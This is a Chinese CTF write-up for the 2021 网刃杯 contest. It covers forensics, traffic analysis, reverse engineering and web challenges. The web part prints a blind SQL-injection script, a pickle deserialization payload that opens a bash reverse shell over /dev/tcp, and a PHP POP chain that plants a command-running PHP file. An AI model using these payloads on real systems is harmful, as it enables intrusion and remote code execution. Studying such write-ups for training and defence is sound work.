2021网刃杯WP

2021网刃杯WP

成绩

第二名

MISC部分

气死我了气死我了气死我了
私钥头错了一直卡着，过了就好说多了。
注：encrypted ad1是赛后出的

签到

解压得到flag.txt和一段密文
Flag.txt是0宽
勾选BCDE(vim查看就可以看到要勾选这几个)、得到hint

myself居然是flag.txt的md5，我麻了
得到key：f71b6b842d2f0760c3ef74911ffc7fdb
最后测试rabbit，得到flag

flag{WelY0me_2_bOl3an}

baby-usb

键盘流量，完全按这篇即可
http://www.ga1axy.top/index.php/archives/22/
脚本直接用，步骤直接仿
得到

output :
CT[DEL]ONH[DEL]GRATUE[DEL]LATIOKE[DEL][DEL]NSONFINY[DEL]DINGMEBUTIWII[DEL]LLNS[DEL]OTTELLYOUWHERETQA[DEL][DEL]HEPZ[DEL]ASSWORDWS[DEL][DEL]OX[DEL]FWE[DEL]OD[DEL]RDDOC[DEL]CUMENTISGOARFV[DEL][DEL][DEL]NDFINDITAGAIN

发现删除的就是KEY，
The key is qazwsxedcrfv

即可打开word

flag{685b42b0-da3d-47f4-a76c-0f3d07ea962a}

Mspaint

上vol，imageinfo显示Win7，pslist发现用了cmd、画图、ie，cmd说他喜欢把图片截图下来，因此filescan |grep ‘png’

导出，发现文件只有一个hack
然后iehistory发现他访问了一个百度云盘链接，尝试用hack，成功。密码即hack。下载下来附件，居然有密码。
因此查看内存图，方法如此链接最后一个
https://blog.csdn.net/qq_42880719/article/details/117304586

因为我怕看错（主要是我眼比较瞎），所以我用zip爆破软件，用户自定义爆
我选择了8%R~sSA52!iqp，长度8位

解压之后，发现是python写的
于是直接逆

参考：https://blog.csdn.net/weixin_44362969/article/details/105616531
第一步：python pyinstxtravtor.py xxxxx.exe

第二步：得到一个文件夹
其中有一个struct 跟 xxxxx（都没有后缀名）
十六进制查看struct，xxxxx。
会发现xxxxx比struct少了一行
这时将struct的那一行复制给xxxxx，然后xxxxx保存后添加后缀
xxxxx.pyc

第三步：使用uncompyle6（我是kali）
uncompyle6 xxxxx.pyc > xxxxx.py

得到

key = 'xxxxxxxxxxxxxxx'
flag = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
data = ''
for i in range(0, len(flag)):
    data += hex(ord(flag[i]) ^ ord(key[(i % 15)]))[2:].zfill(2)
else:
    print(data.upper())
    data = '12045014240343684450506E5E1E1C165D045E6B52113C5951006F091E4F4C0C54426A52466A165B0122'

然后现在需要找key，但是我们知道flag{开头，因此可以反推出key前5位

f = [18,4,80,20,36]
keys = 'flag{'
for i in range(len(f)):
    print(chr(f[i]^ord(keys[i])),end='')

得到th1s_，直接winhex搜key

keys = 'th1s_1s_th3_k3y'
s = '12045014240343684450506E5E1E1C165D045E6B52113C5951006F091E4F4C0C54426A52466A165B0122'
for i in range(len(s)//2):
    print(chr(int(s[i*2:i*2+2],16)^ord(keys[(i % 15)])),end='')

其实这里预期搜key应该是内存取证用screenshot指令，可以看到key

flag{20708c15-eb55-4cbc-930b-68de15c55b32}

encrypted ad1

积累了，学到了。是我傻了
下载下来文件名为ZW5jcnlwdA，解码之后得到encrypt
结合题目为ad1，所以应该是一个ad1的磁盘文件，并且加了密
查看文件尾，能够看到一串base

但很明显，这里转过来了，因此复制出来脚本转一下

s = '''==gqxEjgKtDzKI/D1ajBJIcxvLrijkUVc28YA3sTmY8Ac+r3fiDWl80a
44vbCwhxf8xwibLU6V1Ek31d7Q8W78VcYS+8Za1+IhG3hQ3NiLkbmqXUzb2M3Ou7
15G1xhX3lvi7Yj2CyTz68WQKzcoTvv4pZU+ISdQdNcoJEQSJhocwQAYgCUowrcMW
AytwCo05H/yUQGTYA7acF8stHPUPScAoWdL/NW5FqASDAJRN7cM/3kR9GWzTw4WI
mS36/C/94OBX1jJQVssAnd1NPD2F9EcX0GS2L9GIzdPyL5kZgZ8I2ShrzGo//HX5
G+IqTcKRqsB5TAOddb4lTp/r6XowLqAY9IZJAGoAR9kcrKNzwsJXn6HZN29ilFTC
VnwRqDpDulps/c2fyInUqsHzZxctm5iiCZRiy1XjcyLrJtRKbTvyfXY1K7D1Q+dg
eKbzHMihscHQiBL+WMG/3Drwsz/vQiXdS7QCpNU230WH0HXZiqItJOfPLrpR5L7g
VPjDC1WRlB2J169jNBIABGoAFCd8AqBrKhkTxfHOGZOugFK5RXT2+9S1rZEGMg5b
xtBgNzeFo9pq2RtXAeWgXcJXSUC9MFnY5fbuToUSOlvsYr4CKk99EFiX7S1YU+Eo
hUTs6hRIXbt6EdzkVQsZbDkgLIrjiOyRXO20Quq/a09PqC/ZqXz+mztjgRvlPYj4
fgNABGoAxIhFqK1LV4121nsmnKfgPLUTEZk1bG05dULkA86/AdRgbJWJ+38/4Z+K
GRT8Kqu2dQ4f47fSp+OQL76S4ur0Vmk2vXHOZqXuZIvBIV/5ZmO8uC5sdyT+Cb+3
19ct8Twfc9lACABWXDG5kijTdzytbabEFmONqNHlOutjTFjGmWOABGoABFWJTb6I
n8Or2leNITMvoTZeew52vTTGfAWmLeNfHh+qgRGt6QmpHt8+YqUyQr6HMFq5bNIH
HeLDiPc6R6/eaiCZ2VYYf8G6G9vfzZLyb4JD8WHP3q4+gPlg+n1xQCsv+t5cGuhL
JhPoD69aIgB0rxiEDzV6zG3SqziFZXjYtyXYpZ2oFEWTbXBMhnTucJXTRrxktXXx
P3e1cRCbX0VZXxpZeLqd62O9s5QnfJJxSsHOaR8YZ2ONVLtotpFB6/WDX392066T
jppXfKSRqD7QMDNO0Xd0nvRYfvAW2T9jsEPxPx2ZCV+JPYu2SKneIYz+QYYcaPA1
zaE+aypIzG6SfCQABIoABAQADIQdDBG79zq8d0RhLOCxVaKSLcSQCTRtETiTLUYU
yYk0WRs709wlDEsm0VsQI+X7HDSxaQJeIBWzZUaAs0ALuIqW4kw5Ny6ZSN1n52HJ
QMEJV50RwrFxjgH5DfLGa7P2nQJWivL02fgBeaGtjkSi86zoPwOmmYnocbP3Ad0t
bQtXECvOEUiz8TsbgalR5bkKpSTmR98NCO9SKAVUN5IM8uOnl2ct/37JLMYa+fGZ
Q3I4ZHZmJN8vOANsnCNs68+QVWtRIo4fAp2QqHpmn/Is8OeOcwEJkwA3HJvJbHLI
w0vleLaqwCP9UfXGHlBbknjJ4Deqb5RqnHQsN383ey+IADewAEQACKAABIApEIIM'''

print(s[::-1])

得到一个base串，看了之后应该类似于RSA之类的。
然后打开搞磁盘文件常用的FTK，发现FTK能解密，于是为了研究，主动去生成了一个ad1

然后反正就生成一个ad1，记得生成的文件给他加个密

注意到正确的文件头应该是41 44
于是将题目的文件尾base删掉、文件头00 00 改成 41 44
然后FTK里点击decrypt ad1选项
可以注意到

能使用证书来解密，于是尝试。
然鹅比赛期间我一直没添加—–BEGIN RSA PRIVATE KEY—–头和—–END RSA PRIVATE KEY—–尾，一直是加的—–BEGIN PRIVATE KEY—–，导致没解出来，我麻了

如图，然后保存为pfx文件。

解密之后，用FTK挂载此文件

这里我挂载到了H盘

直接想到时间来作为2进制，2进制转ascii
于是写个脚本转换

import os
list = ['']*392
i = 0
for j in range(392):
    list[j] = os.path.getmtime('H:\\'+str(j)+'.crypto')
print(list)
flag = ''
for i in range(392):
    if(str(list[i]) == '1629859254.863367'):
        flag += '0'
    else:
        flag += '1'
print(flag)
tmp = ''
for k in range(len(flag)):
    tmp += flag[k]
    if len(tmp) == 8:
        print(chr(int(tmp,2)),end='')
        tmp = ''

得到

You are so cool!!! this is your key: 6a90383cd08c

然后这392个文件是crypto文件

用这个，然后用这个key来解0.crypto和1.crypto(因为这两个时间不一样)

flag{ba40c40b-1356-4fc6-8cc7-6a90383cd08c}

协议

藏在s7里的秘密

下载下来的流量包是部分损坏的，使用网站在线修复
http://f00l.de/hacking/pcapfix.php
然后打开流量包，发现有png，但是就如此提取，必定会混入奇奇怪怪的东西
于是观察之后，用tshark来提取

tshark -r Ks3qlAF1bTuysqpJ.pcap -T fields -e s7comm.resp.data -Y “s7comm.param.func == 0x05 and ip.src==192.168.139.1” > png.txt

得到16进制数
用010打开，将十六进制数复制进去，即可得到图片，但是明显发现高度不对，因此修改任意高度，得到flag

flag{FSfeQefjg}

老练的黑客

和之前工控的那道，不能说是完全相似，只能说是一模一样
类原题博客&&赶快关注工控大佬的博客
根据此博客，能直接找到错误的值

第1199流找到22b8
然后根据观察前面的流，发现read的值是跟在过滤之后的第2个流


然后尝试理解提交

flag{22b81194}

Reverse

reverse1

SM3

然后把下图的复制进脚本

百度一个国密SM3脚本

from math import ceil

##############################################################################
#
#                            国产SM3加密算法
#
##############################################################################

IV = "7380166f 4914b2b9 172442d7 da8a0600 a96f30bc 163138aa e38dee4d b0fb0e4e"
IV = int(IV.replace(" ", ""), 16)
a = []
for i in range(0, 8):
    a.append(0)
    a[i] = (IV >> ((7 - i) * 32)) & 0xFFFFFFFF
IV = a


def out_hex(list1):
    for i in list1:
        print("%08x" % i)
    print("\n")


def rotate_left(a, k):
    k = k % 32
    return ((a << k) & 0xFFFFFFFF) | ((a & 0xFFFFFFFF) >> (32 - k))


T_j = []
for i in range(0, 16):
    T_j.append(0)
    T_j[i] = 0x79cc4519
for i in range(16, 64):
    T_j.append(0)
    T_j[i] = 0x7a879d8a


def FF_j(X, Y, Z, j):
    if 0 <= j and j < 16:
        ret = X ^ Y ^ Z
    elif 16 <= j and j < 64:
        ret = (X & Y) | (X & Z) | (Y & Z)
    return ret


def GG_j(X, Y, Z, j):
    if 0 <= j and j < 16:
        ret = X ^ Y ^ Z
    elif 16 <= j and j < 64:
        # ret = (X | Y) & ((2 ** 32 - 1 - X) | Z)
        ret = (X & Y) | ((~ X) & Z)
    return ret


def P_0(X):
    return X ^ (rotate_left(X, 9)) ^ (rotate_left(X, 17))


def P_1(X):
    return X ^ (rotate_left(X, 15)) ^ (rotate_left(X, 23))


def CF(V_i, B_i):
    W = []
    for i in range(16):
        weight = 0x1000000
        data = 0
        for k in range(i * 4, (i + 1) * 4):
            data = data + B_i[k] * weight
            weight = int(weight / 0x100)
        W.append(data)

    for j in range(16, 68):
        W.append(0)
        W[j] = P_1(W[j - 16] ^ W[j - 9] ^ (rotate_left(W[j - 3], 15))) ^ (rotate_left(W[j - 13], 7)) ^ W[j - 6]
        str1 = "%08x" % W[j]
    W_1 = []
    for j in range(0, 64):
        W_1.append(0)
        W_1[j] = W[j] ^ W[j + 4]
        str1 = "%08x" % W_1[j]

    A, B, C, D, E, F, G, H = V_i
    """
    print "00",
    out_hex([A, B, C, D, E, F, G, H])
    """
    for j in range(0, 64):
        SS1 = rotate_left(((rotate_left(A, 12)) + E + (rotate_left(T_j[j], j))) & 0xFFFFFFFF, 7)
        SS2 = SS1 ^ (rotate_left(A, 12))
        TT1 = (FF_j(A, B, C, j) + D + SS2 + W_1[j]) & 0xFFFFFFFF
        TT2 = (GG_j(E, F, G, j) + H + SS1 + W[j]) & 0xFFFFFFFF
        D = C
        C = rotate_left(B, 9)
        B = A
        A = TT1
        H = G
        G = rotate_left(F, 19)
        F = E
        E = P_0(TT2)

        A = A & 0xFFFFFFFF
        B = B & 0xFFFFFFFF
        C = C & 0xFFFFFFFF
        D = D & 0xFFFFFFFF
        E = E & 0xFFFFFFFF
        F = F & 0xFFFFFFFF
        G = G & 0xFFFFFFFF
        H = H & 0xFFFFFFFF

    V_i_1 = []
    V_i_1.append(A ^ V_i[0])
    V_i_1.append(B ^ V_i[1])
    V_i_1.append(C ^ V_i[2])
    V_i_1.append(D ^ V_i[3])
    V_i_1.append(E ^ V_i[4])
    V_i_1.append(F ^ V_i[5])
    V_i_1.append(G ^ V_i[6])
    V_i_1.append(H ^ V_i[7])
    return V_i_1


def hash_msg(msg):
    # print(msg)
    len1 = len(msg)
    reserve1 = len1 % 64
    msg.append(0x80)
    reserve1 = reserve1 + 1
    # 56-64, add 64 byte
    range_end = 56
    if reserve1 > range_end:
        range_end = range_end + 64

    for i in range(reserve1, range_end):
        msg.append(0x00)

    bit_length = (len1) * 8
    bit_length_str = [bit_length % 0x100]
    for i in range(7):
        bit_length = int(bit_length / 0x100)
        bit_length_str.append(bit_length % 0x100)
    for i in range(8):
        msg.append(bit_length_str[7 - i])

    # print(msg)

    group_count = round(len(msg) / 64)

    B = []
    for i in range(0, group_count):
        B.append(msg[i * 64:(i + 1) * 64])

    V = []
    V.append(IV)
    for i in range(0, group_count):
        V.append(CF(V[i], B[i]))

    y = V[i + 1]
    result = ""
    for i in y:
        result = '%s%08x' % (result, i)
    return result


def str2byte(msg):  # 字符串转换成byte数组
    ml = len(msg)
    msg_byte = []
    msg_bytearray = msg  # 如果加密对象是字符串，则在此对msg做encode()编码即可，否则不编码
    for i in range(ml):
        msg_byte.append(msg_bytearray[i])
    return msg_byte


def byte2str(msg):  # byte数组转字符串
    ml = len(msg)
    str1 = b""
    for i in range(ml):
        str1 += b'%c' % msg[i]
    return str1.decode('utf-8')


def hex2byte(msg):  # 16进制字符串转换成byte数组
    ml = len(msg)
    if ml % 2 != 0:
        msg = '0' + msg
    ml = int(len(msg) / 2)
    msg_byte = []
    for i in range(ml):
        msg_byte.append(int(msg[i * 2:i * 2 + 2], 16))
    return msg_byte


def byte2hex(msg):  # byte数组转换成16进制字符串
    ml = len(msg)
    hexstr = ""
    for i in range(ml):
        hexstr = hexstr + ('%02x' % msg[i])
    return hexstr


def KDF(Z, klen):  # Z为16进制表示的比特串（str），klen为密钥长度（单位byte）
    klen = int(klen)
    ct = 0x00000001
    rcnt = ceil(klen / 32)
    Zin = hex2byte(Z)
    Ha = ""
    for i in range(int(rcnt)):
        msg = Zin + hex2byte('%08x' % ct)
        # print(msg)
        Ha = Ha + hash_msg(msg)
        # print(Ha)
        ct += 1
    return Ha[0: klen * 2]


def sm3_hash(msg, Hexstr=0):
    """
    封装方法，外部调用
    :param msg: 二进制流（如若需要传入字符串，则把str2byte方法里msg做encode()编码一下，否则不编码）
    :param Hexstr: 0
    :return: 64位SM3加密结果
    """
    if (Hexstr):
        msg_byte = hex2byte(msg)
    else:
        msg_byte = str2byte(msg)
    return hash_msg(msg_byte)




print('\n')
if __name__ == '__main__':
    enc=['6b8575c6092240cde08414dafd535bee','f0f659f2951290ad5e076b3fe5e70425','c1d6c663570de9fad13ddef955d8a02b','14c4e442fba6d820ea90ae73ed90ad83','25d997669868d0cf89782349256efb33','78b1ea6bb1ac10287864c8f52d2758b6','67d1259c26765356ddb58c6faf28080c','c1e14e0c86f55ba1d74b35b66f96ad36','3e4f3ee942d1a57182e24df201b7022b','c35557f7e5c389061fb2e2ffa1a644ad','15593844fae18fe1a25f3a9017c73810','c6c21ca591a63755fd77bf5c55a0238a','f90cb529875e83cc191c0e10ead6f73e','3ddbe25f9b183c3e2c33c3b1e501fcd8','30fdf04c347f1d4e335bda670d54eaaf','33feb100c8c7c3769af6e9d26486c646']

    import string
    flag=''
    e=''
    map = string.printable
    for i in range(len(enc)):
        for k in map:
            flag=''+k

            if sm3_hash(bytes(str(flag).encode()))[:32]==enc[i]:

                print(flag)

倒数第5的flag = ‘’+k，每次输出一个，将将其填入，直到最后即可
当最后填入wel30m_t0_sm3!!!
此时输出空白，则此为key

flag{g0042ye_t0_sm4}

2048小游戏

一个不知道啥鬼游戏，找到有flag的逻辑
有个不知道什么的运算。但是经过几次测试，发现分数越多，那个函数得到的值越小。，那就i慢慢凑出来，发现分数为0x2100时刚好满足条件，然后下面就是根据这个分数，异或一个固定值得到一个数，然后下面就是验证前四个数值，就是上面那个数的倒数，然后下面就是对0x2100%8+48，0x2100/8
|

最后

flag{b0d800402}

web

ez_sql

和Inctf的Rssa其中的一个小点考点相同，直接改脚本即可

原文连接：https://www.yuque.com/docs/share/f2e36905-38ae-4c20-8749-5aba747e5b91?#

#-- coding:UTF-8 --
import requests

def strtohex(s):
    ss = "0x"
    for i in s:
        ss +=  str(hex(ord(i))).replace("0x",'')
    return ss

burp0_url = "http://116.62.239.41:4323/"
burp0_headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
character = "zsuaqwxcderfvbgtyhnmjuiklop0123456789."

flag = ""
for j in range(1,100):
    for i in character:
        if j >= 1 and j <=6 :
            payload = strtohex(flag + i + "%")
        else:
            payload = strtohex("%" + flag[-6:] + i + "%")
        sql = "1,2 as username from user where username=0x61646d696e and password like {} union select 1".format(payload)
        params = {
            "sql1":"%27",
            "sql2":sql
        }
        res = requests.get(burp0_url, headers=burp0_headers,params=params)
        print i + " : " + res.text
        if "nonono" in res.text:
            print "字符过长！！！"
            exit(0)
        if "nop" in res.text:
            flag += i
            print flag
            break
        if i == ".":
            print flag
            exit(0)

flag为53a2d36d72760586dfc400e54b54564b

ez_web

考点：文件读取、Python反序列化

右键注释中获得<!-- ?pic=1.jpg -->，发现是一个任意文件读取，使用http://116.62.239.41:4322/?pic=/app/app.py读取源文件，源码如下

import pickle
import base64
from flask import Flask, request
from flask import render_template,redirect,send_from_directory
import os
import requests
import random
from flask import send_file

app = Flask(__name__)

class User():
    def __init__(self,name,age):
        self.name = name
        self.age = age

def check(s):
    if b'R' in s:
        return 0
    return 1


@app.route("/")
def index():
    try:
        user = base64.b64decode(request.cookies.get('user'))
        if check(user):
            user = pickle.loads(user)
            username = user["username"]
        else:
            username = "bad,bad,hacker"
    except:
        username = "CTFer"
    pic = '{0}.jpg'.format(random.randint(1,7))
    
    try:
        pic=request.args.get('pic')
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()
    except:
        pic='{0}.jpg'.format(random.randint(1,7))
        with open(pic, 'rb') as f:
            base64_data = base64.b64encode(f.read())
            p = base64_data.decode()

    return render_template('index.html', uname=username, pic=p )


if __name__ == "__main__":
    app.run('0.0.0.0')

知道了是python的反序列化漏洞，这里直接用巅峰极客2021 opcode的Payload即可

import base64
import pickletools

a = b'''(cos
system
S'bash -c "bash -i >& /dev/tcp/ip/port 0>&1"'
o.'''

a = pickletools.optimize(a)
print(base64.b64encode(a))

获得flagflag{a806de95e0fd1e1ba5de6ed1ef20adb2}

ez_php

构造POP链如下

<?php

class fz
{
    protected $v0id;
    function __construct( $v0id){
        $this->v0id = $v0id;
    }
}

class v0id
{
    protected $xin;
    protected $name;
    protected $group;
    protected $url;
    function __construct($group, $name, $url,$xin){
        $this->name = $name;
        $this->group = $group;
        $this->url = $url;
        $this->xin=$xin;
    }

}
class xin
{
    protected $logwriter;
    function __construct($writer){
        $this->logwriter = $writer;
    }

}


class host
{
    protected $filename;
    protected $format;
    function __construct($filename, $format){
        $this->filename = $filename;
        $this->format = $format;
    }
}

class yang
{
    protected $filters;
    protected $endl;
    function __construct($filters, $endl){
        $this->filters = $filters;
        $this->endl = $endl;
    }
}

class c4t {};
$a=new c4t();
$b=new yang($a,"");
$c=new host(new v0id("/../../../../../var/www/html/atao.php","","",""),$b);
$d=new xin($c);
$f=new v0id('<?=`ls`;?>','../../../../../../var/www/html',"",$d);
$g=new fz($f);
echo urlencode(serialize($g));

接着访问fffffffffffllllllllaaaag文件，下载下来

直接获得flagflag{v3rY_Ez_Php_P0p}